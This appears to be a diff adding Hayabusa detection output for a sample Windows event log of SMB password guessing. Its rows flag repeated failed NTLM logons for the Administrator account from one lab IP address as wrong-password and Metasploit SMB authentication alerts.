+2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0H4OxKzoemZrsosT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wSHnvxa0khWdWBVx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bJkPp0bghDCPYz52  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SfHRWGXjCej9HSPb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X42H7EvrvzsRqXWO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: moo42NdOq30Gnz3T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A4NHVYxxDkCOsQw8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iPUiW0vFQB405kwS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OtcZ4ymkeLHeU7YJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZxZCDKWtqkGJ0dnw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f4GGnhttZgmRPRJo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gI0j9w45eXEFeex3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BVZ2YRDUAOsNgKxo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJfIpxlcwVf7pWga  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Oerixd9ODF6fslsC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sbJC5yvrIymYgaHY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4schZcUP8Im8Ee1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WotargyGlEq9PBch  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2JSMrPoucOR0nzlD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jr4w4uoF2DVZ5n9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v319oZIaOBpuf542  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GNRTL9BLlGWMx6dA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zHlDIOZ9B5uY8Rzz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dr2bvAue8mr5kagX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pXBds9GoXr6IZUfp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aLYuegjXO18lo342  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: To3MMEEvNXKNjKHT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N0HCToTmh3ESGBYt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nNvBueVo3ANNmSSN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mVWOoAG5ermGL2Gl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W7QYJUNPm5b4jprh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PHllwNJvpH3P97cp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tfT8GtafHGYMlkMf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nab7wtZfBVkcynsa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VHiijj7sT9nyqxii  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v06kkhqYNOyEHx2c  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WSTDX16YK5Zgkjxo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u6QWEyTrpndCagP0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7iCaXa5SR5IHJnQA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DNZhcPd1JaNFZMYG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LeOIg10KS60QplWz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: um3Nwo2doDbKJJvz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JuoqbUwc2Nth1xlH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WF8zKIbeboTLLkC6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kSyKc8igfuYLMekV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LHog0TdOci9CCKBa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
